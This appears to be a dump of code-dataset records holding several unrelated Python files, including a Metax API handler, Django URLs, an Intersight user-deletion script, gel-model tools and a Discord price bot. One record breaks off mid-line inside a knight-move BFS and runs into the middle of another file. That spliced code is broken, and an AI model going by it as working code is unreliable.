async def _bulk_patch(self, json_data: list[dict[str, Any]]) -> dict[str, Any]:\n \"\"\"Bulk patch call to Metax REST API.\n\n :param json_data: Dict with request data\n :returns: Dict with full Metax dataset\n \"\"\"\n result: dict[str, Any] = await self._request(method=\"PATCH\", json_data=json_data)\n LOG.info(\"Bulk patch completed for metax datasets\")\n\n return result\n\n # async def _delete_draft(self, metax_id: str) -> None:\n # \"\"\"Delete draft dataset from Metax service.\n #\n # :param metax_id: Identification string pointing to Metax dataset to be deleted\n # \"\"\"\n # await self._request(method=\"DELETE\", path=metax_id)\n # LOG.debug(\"Deleted draft dataset metax ID: %r from Metax service\", metax_id)\n\n async def _publish(self, metax_id: str) -> str:\n \"\"\"Post a call to Metax RPC publish endpoint.\n\n :param metax_id: ID of dataset to be published\n :returns: Preferred identifier of the published dataset\n \"\"\"\n result: dict[str, Any] = await self._request(\n method=\"POST\", url=self.publish_route, params={\"identifier\": metax_id}\n )\n LOG.info(\"Metax ID %s was published to Metax service.\", metax_id)\n\n dataset: str = result[\"preferred_identifier\"]\n return dataset\n\n async def post_dataset_as_draft(self, external_id: str, collection: str, data: dict[str, Any]) -> str:\n \"\"\"Send draft dataset to Metax.\n\n Construct Metax dataset data from submitters' Study or Dataset and\n send it as a new draft dataset to the Metax Dataset API.\n\n :param external_id: external user id, from OIDC provider\n :param collection: Schema of incoming submitters' metadata\n :param data: Validated Study or Dataset data dict\n :raises: HTTPError depending on returned error from Metax\n :returns: Metax ID for dataset returned by Metax API\n \"\"\"\n LOG.debug(\n \"Creating draft dataset to Metax service from collection: %r with accession ID: %r.\",\n collection,\n data[\"accessionId\"],\n )\n await self.check_connection()\n metax_dataset = self.minimal_dataset_template\n metax_dataset[\"metadata_provider_user\"] = external_id\n if collection == \"dataset\":\n dataset_data = self.create_metax_dataset_data_from_dataset(data)\n else:\n dataset_data = self.create_metax_dataset_data_from_study(data)\n metax_dataset[\"research_dataset\"] = dataset_data\n\n metax_data = await self._post_draft(metax_dataset)\n LOG.debug(\n \"Created Metax draft dataset for: %r with accession ID: %r with data: %r.\",\n collection,\n data[\"accessionId\"],\n metax_data,\n )\n metax_id: str = metax_data[\"identifier\"]\n # Metax service overwrites preferred id (DOI) with temporary id for draft datasets\n # Patching dataset with full research_dataset data updates preferred id to the real one\n LOG.debug(\"Updating Metax draft dataset with ID: %r with permanent preferred identifier.\", metax_id)\n await self._patch(metax_id, {\"research_dataset\": dataset_data})\n return metax_id\n\n # async def update_draft_dataset(self, external_id: str, collection: str, data: Dict) -> None:\n # \"\"\"Update draft dataset to Metax.\n #\n # Construct Metax draft dataset data from submitters' Study or Dataset and\n # send it to Metax Dataset API for update.\n #\n # :param external_id: external user id, from OIDC provider\n # :param collection: Schema of incoming submitters' metadata\n # :param data: Validated Study or Dataset data dict\n # :raises: HTTPError depending on returned error from Metax\n # \"\"\"\n # LOG.info(\"Updating collection: %r object data to Metax service.\", collection)\n # await self.check_connection()\n # metax_dataset = 
self.minimal_dataset_template\n # metax_dataset[\"metadata_provider_user\"] = external_id\n # if collection == \"dataset\":\n # dataset_data = self.create_metax_dataset_data_from_dataset(data)\n # else:\n # dataset_data = self.create_metax_dataset_data_from_study(data)\n # metax_dataset[\"research_dataset\"] = dataset_data\n #\n # metax_data = await self._put(data[\"metaxIdentifier\"], metax_dataset)\n # LOG.debug(\"Updated metax ID: %r, new metadata is: %r\", data[\"metaxIdentifier\"], metax_data)\n #\n # async def delete_draft_dataset(self, metax_id: str) -> None:\n # \"\"\"Delete draft dataset from Metax service.\n #\n # :param metax_id: Identification string pointing to Metax dataset to be deleted\n # \"\"\"\n # LOG.info(\"Deleting Metax draft dataset metax ID: %r\", metax_id)\n # await self._delete_draft(metax_id)\n\n async def update_dataset_with_doi_info(\n self, datacite_info: dict[str, Any], metax_ids: list[dict[str, Any]]\n ) -> None:\n \"\"\"Update dataset for publishing.\n\n :param datacite_info: Dict containing info to complete metax dataset metadata\n :param metax_ids: List of Metax id of dataset to be updated\n :raises: HTTPBadRequest if mapping datacite info to metax fails\n \"\"\"\n LOG.info(\n \"Updating metadata with datacite info for Metax datasets: %r\",\n \",\".join([id[\"metaxIdentifier\"] for id in metax_ids]),\n )\n bulk_data = []\n for metax_id in metax_ids:\n metax_data: dict[str, Any] = await self._get(metax_id[\"metaxIdentifier\"])\n\n # Map fields from doi info to Metax schema\n mapper = MetaDataMapper(metax_id[\"schema\"], metax_data[\"research_dataset\"], datacite_info)\n try:\n mapped_metax_data = mapper.map_metadata()\n except SubjectNotFoundException as error:\n # in case the datacite subject cannot be mapped to metax field of science\n reason = f\"{error}\"\n LOG.exception(reason)\n raise web.HTTPBadRequest(reason=reason)\n\n bulk_data.append({\"identifier\": metax_id[\"metaxIdentifier\"], \"research_dataset\": mapped_metax_data})\n\n await self._bulk_patch(bulk_data)\n\n async def update_draft_dataset_description(self, metax_id: str, description: str) -> None:\n \"\"\"Update the description of the draft dataset.\n\n :param metax_id: metax dataset id\n :param description: New description\n :raises: HTTPError depending on returned error from Metax\n \"\"\"\n LOG.info(\"Updating the description of Metax ID: %r.\", metax_id)\n data = await self._get(metax_id)\n data[\"research_dataset\"][\"description\"][\"en\"] = description\n metax_data = await self._put(metax_id, data)\n LOG.debug(\"Updated description of Metax ID: %r, new metadata is: %r\", metax_id, metax_data)\n\n async def publish_dataset(self, metax_ids: list[dict[str, Any]]) -> None:\n \"\"\"Publish draft dataset to Metax service.\n\n Iterate over the metax ids that need to be published.\n\n :param metax_ids: List of metax IDs that include study and datasets\n \"\"\"\n LOG.info(\"Publishing Metax datasets: %s\", \",\".join([id[\"metaxIdentifier\"] for id in metax_ids]))\n\n for obj in metax_ids:\n metax_id = obj[\"metaxIdentifier\"]\n doi = obj[\"doi\"]\n preferred_id = await self._publish(metax_id)\n\n if doi != preferred_id:\n LOG.warning(\"Metax Preferred Identifier: %r does not match object's DOI: %r.\", preferred_id, doi)\n LOG.debug(\n \"Object with Metax ID: %r and DOI: %r is published to Metax service.\",\n obj[\"metaxIdentifier\"],\n obj[\"doi\"],\n )\n\n def create_metax_dataset_data_from_study(self, data: dict[str, Any]) -> dict[str, Any]:\n \"\"\"Construct Metax dataset's research 
dataset dictionary from the submitter's Study.\n\n :param data: Study data\n :returns: Constructed research dataset\n \"\"\"\n research_dataset: dict[str, Any] = self.minimal_dataset_template[\"research_dataset\"]\n research_dataset[\"preferred_identifier\"] = data[\"doi\"]\n research_dataset[\"title\"][\"en\"] = data[\"descriptor\"][\"studyTitle\"]\n research_dataset[\"description\"][\"en\"] = data[\"descriptor\"][\"studyAbstract\"]\n LOG.debug(\"Created Metax dataset from Study with data: %r\", research_dataset)\n return research_dataset\n\n def create_metax_dataset_data_from_dataset(self, data: dict[str, Any]) -> dict[str, Any]:\n \"\"\"Construct Metax dataset's research dataset dictionary from the submitter's Dataset.\n\n :param data: Dataset data\n :returns: Constructed research dataset\n \"\"\"\n research_dataset: dict[str, Any] = self.minimal_dataset_template[\"research_dataset\"]\n research_dataset[\"preferred_identifier\"] = data[\"doi\"]\n research_dataset[\"title\"][\"en\"] = data[\"title\"]\n research_dataset[\"description\"][\"en\"] = data[\"description\"]\n LOG.debug(\"Created Metax dataset from Dataset with data: %r\", research_dataset)\n return research_dataset\n\n async def _healtcheck(self) -> dict[str, str]:\n \"\"\"Check Metax service health.\n\n The service responds with pong when pinged.\n\n :returns: Dict with the status of the Metax service\n \"\"\"\n try:\n start = time.time()\n async with self._client.request(\n method=\"GET\",\n url=f\"{URL(metax_config['url'])}/watchman/ping/\",\n timeout=10,\n ) as response:\n LOG.debug(\"Metax REST API status is: %s.\", response.status)\n content = await response.text()\n if response.status == 200 and content == \"pong\":\n status = \"Ok\" if (time.time() - start) < 1000 else \"Degraded\"\n else:\n status = \"Down\"\n\n return {\"status\": status}\n except ClientConnectorError as e:\n LOG.exception(\"Metax REST API is down with error: %r.\", e)\n return {\"status\": \"Down\"}\n except InvalidURL as e:\n LOG.exception(\"Metax REST API status retrieval failed with: %r.\", e)\n return {\"status\": \"Error\"}\n except web.HTTPError as e:\n LOG.exception(\"Metax REST API status retrieval failed with: %r.\", e)\n return {\"status\": \"Error\"}\n", "repo_name": "CSCfi/metadata-submitter", "sub_path": "metadata_backend/services/metax_service_handler.py", "file_name": "metax_service_handler.py", "file_ext": "py", "file_size_in_byte": 14440, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "service_handler.ServiceHandler", "line_number": 19, "usage_type": "name"}, {"api_name": "yarl.URL", "line_number": 32, "usage_type": "call"}, {"api_name": "conf.conf.metax_config", "line_number": 32, "usage_type": "name"}, {"api_name": "conf.conf.metax_config", "line_number": 34, "usage_type": "name"}, {"api_name": "aiohttp.BasicAuth", "line_number": 35, "usage_type": "call"}, {"api_name": "conf.conf.metax_config", "line_number": 35, "usage_type": "name"}, {"api_name": "conf.conf.metax_config", "line_number": 39, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 41, "usage_type": "name"}, {"api_name": "conf.conf.metax_config", "line_number": 42, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 69, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.info", "line_number": 70, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 70, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 68, "usage_type": "name"}, {"api_name": 
"typing.Any", "line_number": 74, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 80, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.info", "line_number": 81, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 81, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 85, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 92, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.info", "line_number": 93, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 93, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 97, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 104, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.info", "line_number": 105, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 105, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 109, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 115, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.info", "line_number": 116, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 116, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 134, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.info", "line_number": 137, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 137, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 142, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.debug", "line_number": 154, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 154, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.debug", "line_number": 169, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 169, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.debug", "line_number": 178, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 178, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 215, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.info", "line_number": 223, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 223, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 229, "usage_type": "name"}, {"api_name": "metax_mapper.MetaDataMapper", "line_number": 232, "usage_type": "call"}, {"api_name": "metax_mapper.SubjectNotFoundException", "line_number": 235, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.exception", "line_number": 238, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 238, "usage_type": "name"}, {"api_name": "aiohttp.web.HTTPBadRequest", "line_number": 239, "usage_type": "call"}, {"api_name": "aiohttp.web", "line_number": 239, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.info", "line_number": 252, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 252, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.debug", "line_number": 256, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 256, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 258, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.info", "line_number": 265, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 265, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.warning", "line_number": 273, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 273, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.debug", "line_number": 
274, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 274, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 280, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 286, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.debug", "line_number": 290, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 290, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 293, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 299, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.debug", "line_number": 303, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 303, "usage_type": "name"}, {"api_name": "time.time", "line_number": 314, "usage_type": "call"}, {"api_name": "yarl.URL", "line_number": 317, "usage_type": "call"}, {"api_name": "conf.conf.metax_config", "line_number": 317, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.debug", "line_number": 320, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 320, "usage_type": "name"}, {"api_name": "time.time", "line_number": 323, "usage_type": "call"}, {"api_name": "aiohttp.client_exceptions.ClientConnectorError", "line_number": 328, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.exception", "line_number": 329, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 329, "usage_type": "name"}, {"api_name": "aiohttp.client_exceptions.InvalidURL", "line_number": 331, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.exception", "line_number": 332, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 332, "usage_type": "name"}, {"api_name": "aiohttp.web.HTTPError", "line_number": 334, "usage_type": "attribute"}, {"api_name": "aiohttp.web", "line_number": 334, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.exception", "line_number": 335, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 335, "usage_type": "name"}]}
+{"seq_id": "73963340327", "text": "from django.contrib.auth.views import LogoutView\nfrom django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.dashboard, name='homepage'),\n path('id/', views.dashboard_id, name='homepage_id'),\n path('login/', views.login_page, name='login'),\n path(\"logout/\", LogoutView.as_view(template_name='login.html'), name=\"logout\"),\n path('register/', views.register_page, name='register'),\n path('activate/', views.activate, name='activate'),\n]", "repo_name": "tomyhrdnsyh/Website-Gym-Member-Register", "sub_path": "dashboard/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 474, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LogoutView.as_view", "line_number": 9, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LogoutView", "line_number": 9, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}]}
+{"seq_id": "20974563468", "text": "#!/usr/bin/env python\n\"\"\"Delete an Intersight user by Cisco.com ID via the Intersight API.\"\"\"\nimport sys\nimport json\nimport argparse\nfrom intersight.intersight_api_client import IntersightApiClient\nfrom intersight.apis import iam_user_api\n\n\ndef delete_user(intersight_api_params, user_email):\n# Create Intersight API instance\n # ----------------------\n api_instance = IntersightApiClient(\n host=intersight_api_params['api_base_uri'],\n private_key=intersight_api_params['api_private_key_file'],\n api_key_id=intersight_api_params['api_key_id'],\n )\n\n try:\n # GET Users\n users_handle = iam_user_api.IamUserApi(api_instance)\n kwargs = dict(filter=\"Email eq '%s'\" % user_email)\n users_result = users_handle.iam_users_get(**kwargs)\n if users_result.results:\n # DELETE Users\n users_delete_result = users_handle.iam_users_moid_delete(moid=users_result.results[0].moid)\n else:\n print(\"User not found:\", user_email)\n\n except Exception as err:\n print(\"Exception:\", str(err))\n import traceback\n print('-' * 60)\n traceback.print_exc(file=sys.stdout)\n print('-' * 60)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('-i', '--id', required=True, help='Cisco email ID of the user to delete')\n help_str = 'JSON file with Intersight API parameters. Default: intersight_api_params.json'\n parser.add_argument('-a', '--api_params', default='intersight_api_params.json', help=help_str)\n args = parser.parse_args()\n with open(args.api_params, 'r') as api_file:\n intersight_api_params = json.load(api_file)\n\n delete_user(intersight_api_params, args.id)\n\n sys.exit(0)\n", "repo_name": "CiscoUcs/intersight-python", "sub_path": "examples/delete_user.py", "file_name": "delete_user.py", "file_ext": "py", "file_size_in_byte": 1758, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 24, "dataset": "github-code", "pt": "53", "api": [{"api_name": "intersight.intersight_api_client.IntersightApiClient", "line_number": 13, "usage_type": "call"}, {"api_name": "intersight.apis.iam_user_api.IamUserApi", "line_number": 21, "usage_type": "call"}, {"api_name": "intersight.apis.iam_user_api", "line_number": 21, "usage_type": "name"}, {"api_name": "traceback.print_exc", "line_number": 34, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 34, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 39, "usage_type": "call"}, {"api_name": "json.load", "line_number": 45, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 49, "usage_type": "call"}]}
+{"seq_id": "17441391104", "text": "from collections import deque\ndx=[-2,-1,2,1,2,1,-2,-1]\ndy=[1,2,1,2,-1,-2,-1,-2]\n\ndef bfs(sx,sy,ex,ey, l):\n visited = [[0] * l for _ in range(l)]\n q = deque()\n q.append([sx,sy])\n visited[sy][sx] = 1\n while bool(q):\n x, y = q.popleft()\n for i in range(8):\n nx = x + dx[i]\n ny = y + dy[i]\n if 0<=nx=self.bound\n cond_y = abs(nextpoint[1])>=self.bound\n cond_z = abs(nextpoint[2])>=self.bound\n\n if cond_x or cond_y or cond_z:\n break\n\n self.points = np.vstack((self.points, nextpoint)) \n\n def save_to_vtk(self, fname, sep=\",\"):\n point_data = pyvtk.PointData(\\\n pyvtk.Vectors(self.u, name=\"u\"),\n pyvtk.Tensors(arr_to_tensor(self.F), name=\"F\"),\n pyvtk.Tensors(arr_to_tensor(self.C), name=\"C\"),\n pyvtk.Tensors(arr_to_tensor(self.R), name=\"R\"),\n pyvtk.Tensors(arr_to_tensor(self.U), name=\"U\"),\n pyvtk.Vectors(self.eigval, name=\"w\"),\n pyvtk.Tensors(arr_to_tensor(self.eigvec), name=\"v\"),\n pyvtk.Scalars(self.mu, name=\"mu\"),\n pyvtk.Scalars(self.stretches, \"stretches\")\n )\n\n # print(pyvtk.Tensors(3, \"3\"))\n\n vtk = pyvtk.VtkData(\\\n pyvtk.PolyData(self.points), \n point_data\n )\n\n vtk.tofile(fname) \n\n def calc_deformation(self):\n \n # Deformations\n super().calc_deformation()\n\n # Stretches\n npoints = self.points.shape[0]\n v = np.broadcast_to(self.direction, (npoints, 3))\n v = np.ascontiguousarray(v)\n v = v.reshape((-1, 3, 1))\n\n self.stretches = np.matmul(v.transpose(0, 2, 1), np.matmul(self.C, v)) ** 0.5\n self.stretches = self.stretches.flatten()\n\n def assemble_df(self):\n super().assemble_df()\n self.df[\"stretches\"] = self.stretches\n\n\n", "repo_name": "jdsteinman/Gel-Model", "sub_path": "bar/tools.py", "file_name": "tools.py", "file_ext": "py", "file_size_in_byte": 12505, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.asarray", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.ndim", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 22, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.arctan2", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.arctan2", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.cross", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.zeros", 
"line_number": 122, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 129, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 130, "usage_type": "call"}, {"api_name": "pyvtk.PointData", "line_number": 148, "usage_type": "call"}, {"api_name": "pyvtk.Vectors", "line_number": 149, "usage_type": "call"}, {"api_name": "pyvtk.Tensors", "line_number": 150, "usage_type": "call"}, {"api_name": "pyvtk.Tensors", "line_number": 151, "usage_type": "call"}, {"api_name": "pyvtk.Tensors", "line_number": 152, "usage_type": "call"}, {"api_name": "pyvtk.Tensors", "line_number": 153, "usage_type": "call"}, {"api_name": "pyvtk.Vectors", "line_number": 154, "usage_type": "call"}, {"api_name": "pyvtk.Tensors", "line_number": 155, "usage_type": "call"}, {"api_name": "pyvtk.Scalars", "line_number": 156, "usage_type": "call"}, {"api_name": "pyvtk.VtkData", "line_number": 160, "usage_type": "call"}, {"api_name": "pyvtk.PolyData", "line_number": 161, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 174, "usage_type": "call"}, {"api_name": "scipy.linalg.polar", "line_number": 180, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.linalg.eig", "line_number": 188, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.take_along_axis", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 194, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 200, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 204, "usage_type": "call"}, {"api_name": "numpy.hsplit", "line_number": 207, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.hsplit", "line_number": 218, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 354, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 354, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 355, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 355, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 365, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 369, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 380, "usage_type": "call"}, {"api_name": "pyvtk.PointData", "line_number": 383, "usage_type": "call"}, {"api_name": "pyvtk.Vectors", "line_number": 384, "usage_type": "call"}, {"api_name": "pyvtk.Tensors", "line_number": 385, "usage_type": "call"}, {"api_name": "pyvtk.Tensors", "line_number": 386, "usage_type": "call"}, {"api_name": "pyvtk.Tensors", "line_number": 387, "usage_type": "call"}, {"api_name": "pyvtk.Tensors", "line_number": 388, "usage_type": "call"}, {"api_name": "pyvtk.Vectors", "line_number": 389, "usage_type": "call"}, {"api_name": "pyvtk.Tensors", "line_number": 390, "usage_type": "call"}, 
{"api_name": "pyvtk.Scalars", "line_number": 391, "usage_type": "call"}, {"api_name": "pyvtk.Scalars", "line_number": 392, "usage_type": "call"}, {"api_name": "pyvtk.VtkData", "line_number": 397, "usage_type": "call"}, {"api_name": "pyvtk.PolyData", "line_number": 398, "usage_type": "call"}, {"api_name": "numpy.broadcast_to", "line_number": 411, "usage_type": "call"}, {"api_name": "numpy.ascontiguousarray", "line_number": 412, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 415, "usage_type": "call"}]}
+{"seq_id": "9297894862", "text": "\"\"\"\nCommand-Line interface functionality for synchronization\n\"\"\"\nimport json\nimport argparse\nimport cattr\nfrom nowcastlib.pipeline.structs import config\nfrom nowcastlib.pipeline import sync\n\n\ndef configure_parser(action_object):\n \"\"\"Configures the subparser for our preprocess command\"\"\"\n sparser = action_object.add_parser(\n \"sync\",\n description=\"Synchronize datasets\",\n help=\"Run `nowcastlib sync -h` for further help\",\n formatter_class=argparse.HelpFormatter,\n )\n sparser.add(\n \"-c\",\n \"--config\",\n required=True,\n help=\"path to JSON file following the DataSet format. See docs for available fields\",\n )\n\n\ndef run(args):\n \"\"\"runs appropriate function based on provided cli args\"\"\"\n with open(args.config) as json_file:\n options = json.load(json_file)\n cattr_cnvrtr = cattr.GenConverter(forbid_extra_keys=True)\n dataset_config = cattr_cnvrtr.structure(options, config.DataSet)\n return sync.synchronize_dataset(dataset_config)\n", "repo_name": "thesofakillers/nowcastlib", "sub_path": "nowcastlib/pipeline/sync/cli.py", "file_name": "cli.py", "file_ext": "py", "file_size_in_byte": 1020, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "argparse.HelpFormatter", "line_number": 17, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 30, "usage_type": "call"}, {"api_name": "cattr.GenConverter", "line_number": 31, "usage_type": "call"}, {"api_name": "nowcastlib.pipeline.structs.config.DataSet", "line_number": 32, "usage_type": "attribute"}, {"api_name": "nowcastlib.pipeline.structs.config", "line_number": 32, "usage_type": "name"}, {"api_name": "nowcastlib.pipeline.sync.synchronize_dataset", "line_number": 33, "usage_type": "call"}, {"api_name": "nowcastlib.pipeline.sync", "line_number": 33, "usage_type": "name"}]}
+{"seq_id": "33674957269", "text": "import hikari\nimport requests\nimport os\nfrom dotenv import load_dotenv\nfrom nft import fetcher\nfrom crypto import coinFetcher\nfrom stocks import stockFetcher, afterHoursFetcher\nload_dotenv(override=False)\ndiscord_token = os.environ.get('TOKEN')\nadmin_token=os.environ.get('ADMIN')\n\n\n#intent\nbot = hikari.GatewayBot(\n discord_token,\n intents=hikari.Intents.ALL_UNPRIVILEGED # Add this\n | hikari.Intents.MESSAGE_CONTENT, # \n)\n\n\n@bot.listen()\nasync def ping(event: hikari.GuildMessageCreateEvent) -> None:\n if event.content and event.content.startswith(\"t\") and event.content[1] == \" \":\n message = (event.content[2:]).upper()\n coins = message.split(\" \")\n response = \"\"\n for coin in coins:\n price = coinFetcher(coin)\n response += f\"**{coin}**: ${price}\\n\"\n await event.message.respond(response)\n \n if event.content and event.content.startswith(\"p\") and event.content[1] == \" \":\n message = (event.content[2:]).upper()\n stocks = message.split()\n for stock in stocks:\n embed = stockFetcher(stock, event.message)\n await event.message.respond(embed=embed)\n\n if event.content and event.content.startswith(\"pa\") and event.content[2] == \" \":\n message = (event.content[3:]).upper()\n stocks = message.split()\n for stock in stocks:\n embed = afterHoursFetcher(stock, event.message)\n await event.message.respond(embed=embed)\n\nbot.run()\n", "repo_name": "Jckhe/Jack-Bot", "sub_path": "jackbot.py", "file_name": "jackbot.py", "file_ext": "py", "file_size_in_byte": 1491, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 10, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 8, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 9, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 10, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 10, "usage_type": "attribute"}, {"api_name": "hikari.GatewayBot", "line_number": 14, "usage_type": "call"}, {"api_name": "hikari.Intents", "line_number": 16, "usage_type": "attribute"}, {"api_name": "hikari.Intents", "line_number": 17, "usage_type": "attribute"}, {"api_name": "hikari.GuildMessageCreateEvent", "line_number": 22, "usage_type": "attribute"}, {"api_name": 